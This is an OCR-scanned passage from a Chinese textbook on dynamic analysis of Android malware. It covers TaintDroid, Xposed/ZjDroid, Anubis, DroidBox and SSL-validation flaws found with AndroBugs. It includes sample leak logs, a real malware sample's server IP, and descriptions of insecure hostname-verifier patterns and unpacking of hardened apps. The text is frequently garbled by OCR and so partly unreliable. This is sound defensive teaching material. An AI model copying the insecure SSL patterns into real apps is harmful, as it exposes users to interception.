实现 分 析 ,容易 与 恶意 代码 产生 平台 竞争 而 被 检测 和 反 制 ;Taintdroid 通过 更 改 Dalvik 虚 
拟 机 实现 了 对 应 用 程序 内 部 .应 用 程序 之 间 的 敏感 数据 流动 的 监控 ,需要 对 源码 进行 大 量 
的 修改 和 配置 ,并 且 只 能 针对 Java 代码 实施 分 析 ; 维 也 纳 理工 大 学 研发 的 TTAnalyze 和 
加 州 大 学 伯克利 分 校 研 发 的 BitBlaze, DT A ++ 基于 硬件 模拟 器 实现 ,通过 模拟 CPU, A 
存 、 外 设 等 硬件 提供 更 加 真实 的 仿真 环境 ,从 模拟 硬件 上 提取 信息 以 实现 恶意 软件 样本 自 
动 分 析 。 目 前 ,BitBlaze 研究 团队 正在 对 其 进行 进一步 的 扩充 ,使 之 可 以 满足 Android 程 
序 分 析 的 需要 ,系统 代号 为 DroidBlaze。 基 于 硬件 模拟 的 分 析 方法 是 恶意 软件 分 析 方 面 
一 个 较 大 的 进步 ,该 方式 从 模拟 硬件 层 获取 数据 ,分 析 过 程 对 恶意 代码 完全 透明 ,不 受 代 
码 加 壳 、 混 清 等 反 制 手段 的 干扰 ,在 适用 性 和 数据 获取 准确 度 方面 均 具 有 较 大 的 优势 。 

根据 提取 行为 的 层次 的 不 同 ,针对 Android 应 用 软件 的 动态 行为 分 析 可 分 为 基于 
Linux 内 核 层 的 监控 .基于 Framework 层 的 监控 两 大 类 别 。 

1) 基于 Linux 内 核 层 的 监控 

该 类 研究 主要 通过 获取 Linux 内 核 层 的 系统 调用 信息 来 寻找 潜在 的 恶意 行为 。 
CrowDroid 使 用 异常 检测 来 检测 可 能 的 恶意 应 用 。 作 者 开发 了 一 个 轻 量 级 的 客户 端 
CrowDroid 运行 于 用 户 设备 上 , 它 使 用 Strace 工具 监控 Linux 层 的 系统 调用 ,将 其 预 处 理 
后 再 发 送 给 服务 器 。 服 务 器 负责 解析 数据 ,并 为 应 用 程序 构建 行为 集 。 服 务 器 使 用 聚 类 
算法 从 多 个 用 户 提交 的 同一 应 用 的 行为 集中 提取 应 用 程序 的 正常 行为 集 , 使 用 该 正常 行 
为 集 与 后 来 用 户 提 交 的 数据 进行 比较 ,从 而 识别 出 拥有 相同 的 名 字 和 标识 符 但 是 却 有 着 
不 同行 为 的 恶意 木马 应 用 。 

Paranoid Android 提出 了 一 个 基于 云 的 检测 框架 ,在 用 户 设 备 上 收集 程序 运行 信息 ， 
将 其 传递 到 服务 器 进行 分 析 , 服 务 器 运行 一 个 与 设备 对 应 的 虚拟 副本 ,根据 收集 到 的 信息 
进行 同步 执行 。Paranoid Android 对 由 init 函数 启动 的 所 有 进程 进行 跟踪 ,收集 最 少 的 
可 反映 手机 真实 运行 情况 的 数据 ,传递 给 云端 服务 器 ,服务 器 通过 这 些 数 据 将 运行 过 程 重 
现 , 使 用 反 病 毒 软件 和 动态 污点 传播 分 析 是 否 有 恶意 行为 存在 。Paranoid Android 利用 
服务 器 比 移动 设备 具备 更 多 计算 资源 的 优势 ,可 对 应 用 程序 的 运行 进行 复杂 深入 的 分 析 ， 
然而 大 量 数据 的 传输 对 用 户 而 言 仍 是 一 个 负担 。 

2) 基于 Framework 层 的 监控 

该 类 研究 主要 通过 修改 Android 系统 ,获取 java 层 的 行为 数据 进行 分 析 。 
TaintDroid 使 用 动态 污点 传播 技术 跟踪 用 户 隐 私 数据 在 应 用 程序 和 系统 中 的 传播 ,检测 
隐私 数据 泄露 行为 。TaintDroid 修改 了 Android 系统 以 提供 污点 的 标记 并 追踪 其 传播 。 
TaintDroid 在 相关 API 调用 处 将 隐私 数据 标记 为 污点 数据 ,在 隐私 数据 通过 程序 变量 、 
文件 .进程 间 通 信 传 播 时 提供 标记 , 若 发 现 污点 数据 通过 网 络 传输 出 去 或 以 其 他 方式 离开 
系统 , 则 判定 发 生 了 隐私 泄露 。 由 于 TaintDroid 只 追踪 数据 流 信息 ,因此 不 能 检测 通过 
控制 流 攻 击 导致 的 信息 泄露 。TaintDroid 也 可 以 用 于 离线 分 析 的 动态 分 析 中 。 
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AppFence 对 TaintDroid 进行 了 扩展 以 检测 更 多 的 隐私 泄露 情景 ,并 针对 不 同 的 情景 设 
计 了 不 同 的 防护 方案 。 


1144 动态 行为 分 析 典 型 工具 


1. Xposed 框架 

Xposed”! f — 47 JF Ui f£ 998 , A F3 icf 998 T DJ As ita BE lt p WRAD AI d$ T E As eR 
应 用 程序 的 行为 。 这 种 方式 有 一 个 很 大 的 优势 ,就 是 这 个 模块 适用 于 不 同 的 版 本 的 
ROM 或 应 用 程序 (只 要 源 代 码 改变 不 是 太 大 )。 通 过 在 Xposed 中 关闭 模块 并 重启 系统 ， 
模块 可 以 轻易 删除 ,从 而 避免 对 系统 和 应 用 程序 产生 影响 。 利 用 Xposed 框架 可 以 使 用 
多 个 模块 对 某 一 特定 部 分 做 更 改 , 这 是 修改 源 代码 无 法 做 到 的 。 

1) Xposed 工作 原理 

Android 系统 中 包含 一 个 叫做 Zygote 的 进程 ,该 进程 是 Android 运行 时 的 核心 部 
分 。 每 一 个 Android 应 用 程序 都 是 通过 Zygote 进程 创建 新 的 进程 (fork)。 系 统 启 动 时 
候 通过 执行 /init. rc 脚本 启动 Zygote 进程 ,最 后 通过 /system/bin/app_process 加 载 需要 
的 类 并 执行 初始 化 方法 。 完 成 这 一 步 之 后 ,Zygote 进程 的 启动 也 就 完成 了 。 

这 个 过 程 也 是 Xposed 发 挥 作用 的 阶段 。 当 系统 安装 了 Xposed 框架 ,一 个 被 扩展 的 
app. process 被 复制 到 /system/bin。 这 个 被 扩展 的 app. process 可 以 加 载 附加 的 JAR 包 
到 classpath 中 ,并 可 以 在 特定 的 时 机 调用 附加 的 方法 。 比 如 说 ,可 以 在 虚拟 机 启动 之 后 ， 
甚至 在 Zygote 的 main 方法 执行 之 前 调用 附加 方法 。 这 些 附加 的 方法 是 Zygote 的 一 部 
分 ,可 以 使 用 Zygote 的 上 下 文 环境 。 附 加 的 JAR 文件 目录 为 /data/data/de. robv. 
android. xposed. installer/bin/XposedBridge. jar. 

2) 方法 劫持 与 替换 

Xposed 真正 强大 的 地 方 是 可 以 劫持 方法 。 当 你 想 要 修改 APK 时 ,可 以 反 编 译 APK 得 
到 源码 ,然后 在 源码 中 直接 修改 代码 。 但 是 ,修改 之 后 还 需要 重新 编译 程序 并 签名 才能 再 次 
发 行 。 利 用 Xposed 的 劫持 功能 ,可 以 在 方法 执行 之 前 和 执行 之 后 插入 你 自己 的 代码 ,从 而 
影响 函数 的 执行 。 然 而 利用 Xposed 的 方法 劫持 功能 并 不 能 修改 方法 内 部 的 多 辑 或 域 。 

XposedBridge 有 一 个 私有 的 本 地 方法 hookMethodNative。 这 个 方法 也 是 在 被 扩展 
的 app_process 中 实现 的 。 它 会 改变 方法 的 类 型 为 本 地 (native) 方 法 ,并 链接 该 方法 到 本 
地 通用 (generic) 的 方法 。 这 意味 着 每 次 调用 被 动 持 的 方法 的 时 候 都 是 执行 generic 方 
法 ,并 且 这 些 对 于 调用 者 是 透明 的 。handleHookedMethod 也 是 XposedBridge 中 实现 的 
方法 ,该 方法 可 以 修改 被 动 持 方法 所 传递 的 参数 和 返回 结果 。 

(1) Xposed 框架 应 用 一 : XPrivacy 模块 。 

XPrivacy 可 以 防止 应 用 泄露 用 户 的 隐私 数据 。XPrivacy 可 以 返回 应 用 程序 错误 的 
数据 或 不 返回 数据 ,具体 来 说 就 是 ,通过 返回 空 的 联系 人 列表 来 限制 应 用 程序 访问 联系 人 
信息 ;通过 返回 虚假 的 位 置信 息 来 限制 应 用 程序 访问 位 置信 息 。 这 样 ,XPrivacy 可 以 限 
制 应 用 程序 访问 的 数据 类 型 XPrivacy 是 基于 Xposed 框架 的 ,所 以 要 使 用 XPrivacy, 首 
先 需要 安装 Xposed 框架 。 

XPrivacy 的 特点 如 下 : 
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不 需要 为 代码 打 补 丁 。 

适用 于 Android 4. 0. 3 一 5. 1.1(ICS,Jelly Bean,KitKat,Lollipop) 版 本 。 
。 新 安装 的 应 用 程序 默认 是 受 限制 的 。 

。 记录 应 用 程序 使 用 过 的 数据 信息 。 

可 以 精细 地 调整 权限 分 配 。 

。 开源 ,免费 ,没有 广告 。 

(2) Xposed 框架 应 用 二 : ZjDroid 模块 。 

ZjDroid 是 基于 Xposed 框架 开发 的 一 款 Android 动态 逆向 分 析 模 块 ,ZjDroid 模块 在 
目标 程序 启动 早期 被 动态 加 载 和 目标 程序 进程 ,并 与 目标 程序 代码 一 起 运行 于 同一 进程 
空间 , 道 向 分 析 人 员 可 以 通过 ZijDroid 解决 日 常 逆向 分 析 中 的 一 些 常 见 棘手 问题 。 

目前 ZjDroid 提供 了 如 下 能 力 供 逆向 人 员 使 用 : 

* DEX 文件 的 内 存 dump. 
* 基于 Dalvik 关键 指针 的 内 存 BackSmali, 有 效 破解 加 固 应 用 。 
敏感 API 的 动态 监控 。 
指定 内 存 区 域 数据 dump。 
。 获取 应 用 加 载 DEX 信息 。 
。 获取 指定 DEX 文件 加 载 类 信息 。 
dump Dalvik java 堆 信 息 。 
在 目标 进程 动态 运行 Lua 脚本 。 

2. Anubis 

Anubis 是 一 项 用 来 分 析 恶 意 程序 的 服务 ,用 户 可 以 通过 Web 界面 免费 使 用 这 项 服 
务 。Anubis 可 以 分 析 Windows 可 执行 文件 和 Android APK, 并 提供 一 份 详细 的 分 析 报 
告 。 也 可 以 用 Anubis 分 析 一 个 可 疑 的 URL, 并 返回 一 个 分 析 报 告 , 详 述 在 访问 URL 过 
程 中 浏览 器 所 执行 的 操作 。 下 面 主要 介绍 Anubis 对 Android APK 的 检测 能 力 。 

使 用 Anubis 对 APK 文件 进行 动态 分 析 可 得 到 一 份 详细 的 分 析 报告 ,报告 的 整体 结 
构 包 括 分 析 目标 的 总 体 情 况 .静态 检测 项 分 析 结 果 动态 检测 项 分 析 结果 、 分 析 过 程 截图 。 

下 面 介绍 分 析 报 告 各 个 部 分 包含 的 内 容 。 

1) APK 文件 的 总 体 情况 

该 项 包括 分 析 目 标 APK 文件 的 文件 名 、 包 名 、 哈 希 值 .文件 大 小 .API Level 等 信息 ， 
如 图 11-41 所 示 。 


General Information 


Filename: com.yiqi.quard.1351650992862.apk 
MDS: cB0dcfb91aefa8f0778deG4d46ce031c 

SHA-1: 688e807f07e494e1c6c6138a85e83f981b6b1344 
File Size: 2390694 Bytes 

API Level: 8 

Maliciousness Rating: 9.99127 (0: likely benign, 10: likely malicious) 


图 11-41 APK 文件 总 体 信息 
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2) 静态 检测 项 

该 项 包括 静态 分 析 的 检测 结果 ,包括 Activity, BroadcastReceiver, Service, Content 
Provider 等 四 大 组 件 信 息 、 申 请 的 权限 、 使 用 的 硬件 特性 以 及 URL 字符 串 信 息 , 如 
图 11-42 所 示 。 


http://xmlpull.org/v1/doc/features.html#validation 
http://www.w3.0rg/2001/XMLSchema-instance 
http://124.207.66.136/userstatnew/startcount.php 
http://jabber.org/protocol/compress 


图 11-42 静态 URL 检测 结果 


3) 动态 检测 项 

该 项 包括 动态 分 析 的 检测 结果 ,包括 文件 操作 行为 .网 络 访 问 行为 .加 密 算法 使 用 记 
录 、 加 载 代码 行为 .数据 泄露 行为 等 。 其 中 ,数据 泄露 行为 的 检测 使 用 了 11. 4. 2 节 介 绍 的 
TaintDroid 工具 作为 基础 。 

。 文件 操作 ,记录 了 分 析 目 标 都 访问 哪些 文件 ,如 图 11-43 所 示 。 


Dynamic Analysis Report 


Timestamp Operation Path 

2.134 write /data/data/com.yiqi.guard/lib/tmp-1392148841tmp| 

A Lee ee EE Leere Questa, DEFIFEEI x sees ee] ee Le o Nan» 
图 11-43 文件 操作 


* 网 络 流量 日 志 , 可 以 看 到 有 网 络 连 接 的 URL 地 址 、IP 地 址 、 端 口 HTTP 报 文 头 、 
数据 内 容 , 如 图 11-44 所 示 。 


Timestamp Operation Host 

14.138 open 124.207.66.136 
22.133 open 125.76.234.130 
24.136 write 125.76.234.130 


图 11-44 ”网络 流量 日 志 


。 加 密 算法 使 用 记录 ,可 以 得 到 加 密 算 法 的 类 型 .参数 ,如 图 11-45 所 示 。 
。 加 载 代码 行为 ,可 以 得 知 运行 过 程 中 分 析 目 标 动态 加 载 了 哪些 代码 ,如 图 11-46 
所 示 。 

。 数据 泄露 检测 ,此 项 会 列 出 检测 到 的 数据 泄露 内 容 及 泄露 途径 ,如 图 11-47 所 示 。 

3. DroidBox 

DroidBox 采用 了 GNU GPL v2 协议 ,作为 一 个 开源 项 目 托管 在 github 之 上 。 
DroidBox 是 用 来 对 Android APK 做 动态 分 析 的 工具 。 它 采用 了 基于 TaintDroid 构建 的 
沙 盒 , 利 用 该 技术 可 以 发 现 Android 中 的 隐私 数据 是 如 何 泄露 出 去 的 。TaintDroid 把 所 
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Timestamp Operation Algorithm 
45.999 key AES 
9, 42, 2, 54, 4, 45, 6, 7, 65, 9, 54, 1L, 12, 13, 60, 15 

45.999 encryption AES 
357242043237517 

45.999 AES 
0, 42, 2, 54, 4, 45, 6, 7, 65, 9, 54, 11, nd €0, 15 

45.999 decryption AES 
357242043237517 

45.999 key DES 
9, 42, 2, S4, 4, 45, 6, B 

45.999 encryption DES 
357242043237517 

45.000 key Des 
Q9, 42, 2, 55, 4, 45, 6, 8 

46.000 decryption DES 
357242043237517 





图 11-45 ”加密 算法 使 用 记录 


Timestamp Dex Classes Loaded 
25.136 /data/data/com.yiqi.guard/app_bin/dexinject.jar 


图 11-46 加载 代 码 行为 


Timestamp Leak Type Content Leaked 
14439 network TT TEEN TAINT_IMEI, TAINT_IMSI 


T /userstatnew/installcount. php HITP/1. Length: 177 Content-Type: cation/x-ww-forn-ur lencoded Host: 124.207. 66, 136 Connection: 
per Te TACIAS23 IB ome: sei 31000 RITE gei DD reversion Is 0. Tinobi lenodel=generi obnobi lerunber=155552155544e 


图 11-47 数据 泄露 检测 





有 隐私 数据 标记 为 污点 源 , 应 用 程序 在 运行 时 对 隐私 数据 的 任何 操作 所 产生 的 新 数据 也 
都 将 被 标记 为 污点 数据 。 通 过 对 污点 数据 的 追踪 可 以 发 现 隐 私 数据 的 泄露 路 径 。 
DroidBox 还 可 以 监听 文件 的 读 写 ,短信 的 收发 .类 的 装载 .加密 算法 的 调用 等 。 

1) DroidBox 的 安装 

DroidBox 只 能 在 Linux 和 Mac OS 上 使 用 ,下 述 安装 过 程 以 Linux 系统 为 例 。 

(1) 安装 Android SDK。 可 到 http://developer. android. com/sdk/index. html 
下 载 。 

(2) 安装 Python 的 一 些 包 ,包括 numpy ,scipy,matplotlib。 

(3) 把 Android SDK 所 在 的 文件 夹 加 入 执行 路 径 : 


export PATH- $ PATH: /path/to/android- sdk/tools 
export PATH- $ PATH: /path/to/android- sdk/platform- tools 


(4) 下 载 DroidBox 压缩 包 , 解 压 到 任意 目录 下 ,解压 后 得 到 一 个 名 为 DroidBox X 
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件 夹 。 

(5) 新 建 一 个 Android 虚拟 机 ,硬件 平台 选择 Nexus4(ARM CPU), 系 统 选 择 
Android 4. 1. 2, 

(6) 打开 命令 行 ,并 把 当前 目录 切换 到 DroidBox 文件 夹 。 通 过 如 下 脚本 启动 虚 
UL. 


-/startemu.sh «AVD name» 
(7) 虚拟 机 启动 之 后 ,可 以 通过 如 下 脚本 分 析 应 用 程序 : 
./droidbox.sh <file.apk> <duration in secs (optional)> 


在 分 析 过 程 中 ,可 以 通过 Ctrl 十 C 键 终止 分 析 过 程 。 该 脚本 可 以 自动 安装 APK 到 虚 
拟 机 ,并 启动 该 APK ,但 是 分 析 过 程 并 不 是 全 自动 的 ,需要 安全 分 析 人 员 人 工 参与 。 
2) DroidBox 的 分 析 结 
DroidBox 的 动态 分 析 结 果 包 含 以 下 信息 : 
CD. APK 的 哈 希 值 。 
hashes [3] 
© : aabdfae011e3e9cfc3519520350b0641 
1 : 8c189ee0fe385769dab515a20d9eec63c608ee8c 
2 : ee093aa086a1638edd22823ec3c806828caf40ee41f1f48367c172b516c9e070 


可 以 根据 文件 的 哈 希 值 判断 文件 是 否 相同 。 
第 0 项 对 应 于 文件 的 MD5 值 。 

第 1 项 对 应 于 文件 的 SHA-1 ffi. 

第 2 项 对 应 于 文件 的 SHA-256 值 。 

(2) 网 络 流量 日 志 (data 信息 省 略 ) 。 


recvnet {1} 

v 2.0575509071350098 {4} 
data : 
host : 216.58.221.142 
type : net read 
port : 80 

sendnet {1} 

vw 1.5423498153686523 {6} 
type : net write 
desthost : 216.58.221.142 


fd :20 
operation : send 
dota : 

destport : 80 


closenet {0} 
Cempty object) 
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根据 网 络 连接 的 TP. 地 址 ,可 以 追踪 数据 的 流向 ,从 而 更 加 清楚 是 否 发 生 了 数据 泄露 。 
可 以 监控 的 数据 有 TP. 地 址 、 端 口号 .数据 内 容 、` 数 据 流向 。 


(3) 文件 的 读 写 。 


accessedfiles {1} 
1443619803 : /data/data/droidbox.tests/files/output.txt 
fdaccess {2} 
v 1.2272579669952393 {5} 
path : /data/data/droidbox.tests/files/myfilename.txt 
operation : write 
data : 
id : 358465241 
type : file write 
w 1.2945640087127686 {5} 
path : /data/data/droidbox.tests/files/output.txt 
operation : read 
data : 
id : 751902135 
type : file read 


通过 对 文件 的 访问 记录 ,可 以 判断 哪些 文件 有 可 能 被 污染 。 
(4) Service 信息 。 
servicestart {1} 
w 12.21109390258789 (2) 
type : service 
nane : con.android. contacts. ViewNoti Fi cationService 
可 以 查看 启动 了 哪些 Services, 
(5) dex 文件 加 载 。 


dexclass {1} 

v 0.45353198051452637 {2} 
path : /data/app/droidbox.tests-1.apk 
type : dexload 


可 以 监控 应 用 程序 加 载 的 类 有 哪些 。 
(6) 加 密 算法 使 用 的 记录 。 


cryptousage {1} 

w 1.3351409435272217 {4} 
operation : keyalgo 
type : crypto 
algorithm : AES 


key :0, 42, 2, 54, 4, 45, 6, 7, 65, 9, 54, 11, 12, 13, 60, 15 


泄露 的 数据 通常 会 被 加 密 , 通 过 对 加 密 算法 API 的 监控 ,可 以 得 到 加 密 算法 的 类 型 


以 及 参数 ,帮助 分 析 软 件 的 安全 性 。 
CD 数据 泄露 。 
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dataleaks {1} 
v 5.334108829498291 {5} 

message : 922871af351ba74720dd7ab4d9126996. 

v tag [1] 
@ : TAINT IMEI 

type : sms 

sink: SMS 

number : 0735445281 
在 这 一 项 会 列 出 可 能 的 信息 泄露 途径 。 
(8) 短信 的 记录 。 
sendsms {1} 
vw 5.303154945373535 (3) 

message : Sending sms... 


type : sms 
number : 0735445281 


短信 的 通信 记录 ,包含 信息 内 容 、 信 息 类 型 和 接收 方 的 电话 号 码 。 
(9) Receiver, 


recvsaction {1} 
- SMSReceiver : android.provider.Telephony.SMS RECEIVED 


可 以 监控 系统 开启 的 Receiver, 

(10) 通话 记录 。 

phonecalls {1} 

w 5.35893702507019 {2} 

type : call 
number : 123456789 

通话 记录 ,包含 类 型 和 接听 方 的 电话 号 码 。 

4. 金刚 恶意 软件 智能 分 析 系 统 

金刚 恶意 软件 智能 分 析 系 统 29 (以 下 简称 “系统 ”) 以 云 计算 技术 、 硬 件 模拟 技术 和 恶 
意 软件 动态 分 析 技 术 为 核心 ,将 针对 计算 机 与 移动 智能 终端 的 软件 动态 分 析 系 统 以 网 络 
服务 的 形式 提供 给 各 类 用 户 。 系 统 可 以 完全 模拟 用 户 的 操作 系统 环境 和 应 用 软件 配置 ， 
能 够 提供 不 同 版 本 不同 配置 的 Windows 和 Android 操作 系统 分 析 环 境 ,并 能 够 根据 样 
本 类 型 智能 选择 相应 的 分 析 环 境 。 系统 支持 Windows XP, Windows 7, Android 2. x, 
Android 4.x, 以 及 联想 LeOS 等 Android 衍生 操作 系统 平台 软件 的 动态 分 析 。 

系统 的 分 析 模 块 与 分 析 目标 在 不 同 环境 运行 ,对 分 析 目 标 完全 透明 ,可 支持 指令 、 执 
行路 径 、 行 为 等 多 层次 分 析 , 并 具有 对 采取 自修 改 代码 保护 的 特殊 代码 进行 分 析 的 能 力 。 
系统 可 按 需 求 为 用 户 提供 不 同 硬件 架构 .不 同 操作 系统 ,不同 软 件 配 置 的 动态 分 析 环 境 ， 
避免 了 传统 动态 分 析 过 程 中 烦琐 、 复 杂 的 分 析 环 境 构建 过 程 。 此 外 ,系统 可 为 多 种 分 析 环 
境 提 供 统一 的 基础 分 析 服 务 和 动态 分 析 数 据 采 集 接口 ,提升 软件 的 分 析 能 力 、 分 析 效 率 以 
及 分 析 结 果 数据 的 可 靠 性 。 

系统 针对 Android 样本 的 分 析 能 力 如 下 : 
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支持 批量 自动 分 析 。 
支持 基于 快照 的 快速 启动 和 状态 保存 。 
能 够 全 面 监 控 系 统 运行 状态 (进程 、 线 程 、 模 块 等 信息 ) 。 
能 够 全 面 监控 系统 底层 服务 (Android 内 核 syscall) 。 
能 够 全 面 监控 系统 上 层 行 为 (Android 打 电 话 、 数 据 操 作 等 ) 。 
支持 多 种 系统 行为 模拟 (Android 打 电 话 、 设 置 GPS 等 ) 。 
具有 自动 测试 功能 ,模拟 屏幕 点 击 、 键 盘 输入 ,可 自动 识别 并 触发 多 种 UI 控件 。 
具有 网 络 数据 采集 功能 ,自动 抓 取 并 记录 应 用 软件 的 网 络 流量 ,采用 标准 pcap 格 
式 存 储 。 
具有 增强 的 模拟 分 析 系 统 , 基 于 硬件 虚拟 化 技术 ,并 定制 各 种 硬件 参数 (IMEI、 
Model ,手机 号 等 ) ,有效 对 抗 恶意 代码 反 制 。 
集成 了 静态 分 析 功能 ,可 检测 是 否 反射 代码 \ 动 态 载 人 运行 的 代码 等 ,支持 检测 权 
限 误 用 和 每 个 权限 具体 的 代码 调用 位 置 。 

系统 提供 基于 Web 服务 的 批量 样本 分 析 、 基 于 专业 客户 端的 深度 交互 分 析 等 应 用 模 
式 ,读者 可 登录 www. tcasoft. com 网 站 试用 Web 服务 对 apk 样本 展开 分 析 。 


11.5 实际 案例 分 析 


1151. 应 用 软件 实现 安全 性 分 析 


本 节 介 绍 Android 应 用 软件 的 一 个 常见 高 危 漏 洞 一 一 SSL 漏洞 的 描述 以 及 如 何 使 用 
AndroBugs 工具 进行 SSL 漏洞 检测 。 

1. AndroidSSL 漏洞 描述 

SSL(Secure Sockets Layer) 为 服务 器 端 和 客户 端 间 构 建 加 密 的 安全 通信 ,Android 
系统 提供 了 相应 的 接口 供 开发 者 使 用 ,但 同时 也 存在 着 一 些 由 于 Android 应 用 程序 没有 
正确 使 用 SSL 提供 的 接口 而 造成 的 安全 漏洞 ,恶意 攻击 者 可 利用 这 些 漏 洞 执行 例如 拦截 
数据 等 恶意 操作 。 

由 于 Android 允许 证 书 不 可 信 , 由 开发 者 自行 认证 ,Android 官方 文档 对 下 列 3 类 情 
形 给 出 了 明确 的 开发 建议 : 

(1) 未 知 证 书 。 由 某 种 未 知 途径 获取 的 证 书 , 通 常 这 类 证 书 其 签发 方 不 在 Android 
可 信 证 书 集合 中 。 

(2) 自 签 名 。 通 常 是 由 不 可 信 CA 证 书签 发 的 一 张 证 书 (OpenSSL 和 Java 的 
KeyTool 工具 都 具有 这 个 功能 ) 。 

(3) 中 间 CA 缺失 。 在 服务 端 发 送 证 书 链 的 过 程 中 需要 发 送 完整 的 证 书 链 。 但 是 由 
于 服务 器 证 书 与 数据 分 离 等 原因 ,可 能 发 送 的 证 书 链 不 完整 ,中 间 CA 缺失 了 。 

Android 为 了 兼容 上 述 3 种 情况 ,要 求 开发 者 在 程序 中 实现 两 个 接口 类 HostnameVerifier 
和 TrustManager ,并 对 其 中 的 Verify 和 CheckServerTrusted 进行 接口 实现 。 

当 Android 开发 者 没有 严格 遵照 Google 的 开发 建议 ,就 有 可 能 出 现 多 种 证 书 认证 缺 
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陷 , 极 有 可 能 导致 中 间 人 攻击 安全 隐患 。 对 证 书 认证 过 程 可 能 出 现 的 缺陷 分 为 4 类 : 

(1) 可 信 证 书 链 认 证 不 完整 。 一 般 方法 为 通过 空 接口 并 设置 回调 。 客 户 端 在 接收 到 
服务 器 端的 证 书 链 时 ,只 要 存在 证 书 , 无 论证 书 颁 发 者 是 否 在 可 信 CA 集合 ,都 将 证 书 作 
为 可 信 证 书 , 从 而 无 法 对 服务 器 端 做 出 正确 的 识别 。 

(2) 主机 域名 和 证 书 不 验证 。 一 般 会 通过 空 接口 或 者 用 Android 默认 的 ALLOW 
ALL_HOSTNAME_VERIFIER 并 设置 回调 。 客 户 端 因此 在 接收 到 证 书 时 ,不 会 按照 
RFC 2818 标准 对 请 求 的 域名 和 证 书 的 域名 (通常 在 证 书 的 DNS、CN 域 ) 进 行 校 验 。 因 
此 中 间 人 可 以 使 用 域名 为 Domain 的 证 书 来 支持 Domain 的 服务 器 端 请 求 。 

(3) Android Webview 错误 忽略 。 一 般 会 通过 手动 设置 错误 处 理 方法 ,并 在 
WebViewClient 类 中 重 写 onReceivedSslError() 方 法 ,将 错误 处 理 方法 直接 返回 。 客 户 
端 在 此 类 情况 ,SSL 所 保证 的 安全 通信 将 形同虚设 ,中 间 人 支持 无 法 被 发 现 。 

(4) 证 书 锁定 不 完整 。 一 般 会 锁定 证 书 的 几 个 关键 的 域 。 正 确 的 证 书 绑 定 方法 应 该 
是 绑 定 证 书 公 钥 ,动态 载 人 或 者 在 代码 中 国定 。 

早 在 2012 年 ,Fahl、Harbach 等 通过 对 Google Play 市 场 近 1. 3 万 个 普通 App 样本 
进行 分 析 ,发现 Android SSL 安全 存在 严重 安全 漏洞 中 , 极 易 被 黑客 利用 。 该 团队 首先 
提取 应 用 的 联网 权限 ,发 现 大 量 申 请 了 Internet 权限 却 没 有 使 用 联网 API 的 应 用 , 即 权 
限 扩大 威胁 。 然 后 对 其 中 的 100 个 样本 进行 了 中 间 人 攻击 实验 ,发 现 了 大 量 存在 中 间 人 
攻击 漏洞 的 样本 ,通过 对 其 中 部 分 没有 混 消 保护 Android 应 用 的 逆向 分 析 发 现 , 存 在 漏 
洞 的 原因 为 SSL 客户 端 对 服务 端 证 书 认证 不 完整 。 其 后 ,该 团队 研发 了 Android SSL 安 
全 静态 分 析 工 具 MalloDroid, 主 要 是 校 验 移 动 应 用 中 是 否 存在 可 信 证 书 链 不 完整 和 域名 
忽略 校 验 两 种 缺陷 。2013 年 ,Jethro Beekman 和 Christopher Thompson 发 现 了 索尼 手 
机 的 官方 应 用 WiFi Calling 存在 中 间 人 劫持 攻击 漏洞 ,其 原因 为 WiFi Calling 应 用 在 通 
信 过 程 中 没有 对 服务 器 端的 证 书 进行 校 验 , 当 发 生 会 话 劫持 的 时 候 , 客 户 端 无 法 察觉 。 虽 
然 漏洞 爆 出 后 Sony 公司 很 快 修复 了 这 个 漏洞 ,但 是 该 安全 事件 反映 出 手机 厂家 对 用 户 
的 隐私 保障 存在 诸多 问题 。 

2. 使 用 AndroBugs 工具 检测 SSL 漏洞 

对 SSL Implementation Checking 的 检测 分 为 两 部 分 : Verifying Host Name in 
Custom Classes 和 Verifying Host Name in Fields。 

Verifying Host Name in Custom Classes 主要 检测 App 是 否 在 自 定义 的 类 中 实现 了 
HostnameVerifier 接口 , 且 不 安全 地 使 用 了 某 些 方法 。 它 的 执行 过 程 分 为 3 步 : 

CD 检测 所 有 调用 setDefaultHostnameVerifier 和 setHostnameVerifier 函数 的 方法 
( 设 为 Method1), 且 保存 调用 这 些 方法 时 传人 的 第 一 个 参数 所 在 的 类 ( 设 为 Class1)。 

(2) 查找 到 实现 javax/net/ssl/HostnameVerifier 接口 中 verify 函数 的 方法 , 且 此 方 
法 直接 返回 true( 设 为 Method2) 。 

G) 对 于 上 两 步 查 找到 的 方法 , Method2 方法 的 使 用 会 导致 漏洞 。 同时 ,如果 
Method2 所 在 的 类 和 Classl 相同 ,那么 认为 Methodl 方法 的 使 用 也 会 导致 漏洞 。 

Verifying Host Name in Fields 项 检测 App 是 否 使 用 了 ALLOW ALL - 
HOSTNAME VERIFIER 字段 或 AllowAllHostnameVerifier 类 而 导致 了 安全 问题 。 其 
检测 步骤 包括 两 步 : 
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CD 检测 调用 setDefaultHostnameVerifier 和 setHostnameVerifier 函数 的 方法 ,从 这 些 
方法 中 选择 第 一 个 参数 所 在 的 类 为 org/apache/http/conn/ ssl/ AllowAll HostnameVerifier 的 
方法 。 

(2) 查找 到 使 用 ALLOW_ALL_HOSTNAME_VERIFIER field 的 方法 。 

这 两 个 步骤 查找 到 的 所 有 方法 都 被 认为 是 不 安全 的 ,会 导致 漏洞 。 本 节 使 用 
Androbugs 作为 主要 的 漏洞 检测 工具 ,读者 可 从 https://github. com/ AndroBugs/ AndroBugs 
_Framewor 获取 Androbugs 工具 的 详细 安装 和 使 用 信息 。 在 此 ,只 介绍 Androbugs 工具 在 
Linux 环境 中 的 安装 步骤 : 从 https: //github. com/ AndroBugs/ AndroBugs_Framework 网 址 

上 下 载 AndroBugs Framework-master. zip 包 , 并 将 其 解压 即 可 。 

以 4.0.2 版 本 的 手机 QQ 应 用 为 例 ,将 含有 漏洞 的 qq. apk 文件 放 入 到 Androbugs 

工具 的 目录 下 ,然后 在 终端 提示 符 下 进入 到 该 目录 中 ,输入 如 下 命令 : 


python androbugs.py - f qq.apk 


即 可 执行 漏洞 检测 ,执行 完成 后 会 输出 漏洞 检测 报告 ,如 图 11-48 所 示 。 





GOOOOOOOOOOOIOURODROOHOEROEROUROOROOROGROUREGOROOR ORO ORE AERE A GEROER EROR ERR e e 


**  AndroBugs Framework - Android App Security Vulnerability Scanner ** 


- version: 1.0.0 - 
- author: Yu-Cheng Lin (GAndroBugs, http://www.AndroBugs.com) - 
sa contact: androbugs.frameworkggmail.com »- 





ROO RA EREYETEEEEEEXTETEREREEEEEXTRTETEREERERTEREESRAREERAERARTATERTARESKEXEK 


Platform: Android 
Package Name: com.tencent.mobileqq 
Package Version Name: 4.0.2 
